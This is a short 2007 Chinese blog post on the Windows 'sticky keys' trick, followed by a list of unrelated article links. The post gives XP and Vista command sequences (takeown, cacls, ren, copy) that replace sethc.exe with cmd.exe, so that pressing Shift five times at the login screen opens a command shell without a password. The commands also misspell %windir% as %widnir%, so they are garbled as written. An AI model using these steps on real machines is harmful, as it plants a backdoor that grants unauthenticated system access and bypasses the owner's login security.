WINDOWS漏洞：粘置鍵

更新時間：2007年04月23日 00:00:00 作者：

在windows 2000/xp/vista下，按shift鍵5次，可以打開粘置，會運行sethc.exe，而且，在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開shell了。

參考McafeeAvertLabs：
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP：
將安裝源光盤彈出（或將硬盤上的安裝目錄改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA：
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替換文件

在登錄界面按5此SHIFT，出來cmd shell，然后……

WINDOWS漏洞：粘置鍵

輸入gpedit.msc后提示找不到gpedit.msc的解決方法
在“運行”對話框中輸入“gpedit.msc ”后，Windows 卻提示“找不到該文件，無法運行”。
2007-05-05
使用Google工具欄追蹤 Blog 留言
每個開 Blog 的兄弟都會時刻關注 Blog 上的留言，上次已經(jīng)說道如何使用 Gtalk 追蹤網(wǎng)站的留言。在使用 Google 工具條時發(fā)現(xiàn)其實 Google 工具條本身也開放了 API 供用戶調用。第一步要做的就是將用戶留言做成 RSS 格式的輸出（其實也就是 XML 格式，Wordpress 已經(jīng)有這樣的功能了）。
2008-04-04
ghost.pif新變種導致殺毒軟件0xc00000ba失敗的解決方法
ghost.pif新變種導致殺毒軟件0xc00000ba失敗的解決方法...
2007-07-07
非常完整全面的藍屏代碼解讀
非常完整全面的藍屏代碼解讀...
2007-02-02
PuTTY登錄設置的批量備份導出/導入
Putty是最常用的遠程登錄工具和加密代理訪問工具等，管理很多臺服務器的時就有很多登錄配置，當換機器的時候就成了一個問題。
2008-04-04
讓你的ewbeditor也能運行代碼
下面的方法不太好，本站用的是[html]運行的內(nèi)容[/html]就可以實現(xiàn)運行效果代碼
2008-01-01
用nero刻錄可啟動功能的光盤而且光盤不是iso格式的
用nero刻錄可啟動功能的光盤而且光盤不是iso格式的...
2007-12-12
IE8引發(fā) VS2005/2008 MFC向導出錯的解決方案
IE正式版引發(fā)VS2005和VS2008向導出錯的解決方案.這個是VC++團隊給出的.
2009-04-04
女生領巾絲巾的打法圖示教程
女士絲巾的打法圖文示例
2008-04-04
Vmware虛擬機的安裝及配置方法
Vmware虛擬機的安裝及配置方法...
2007-11-11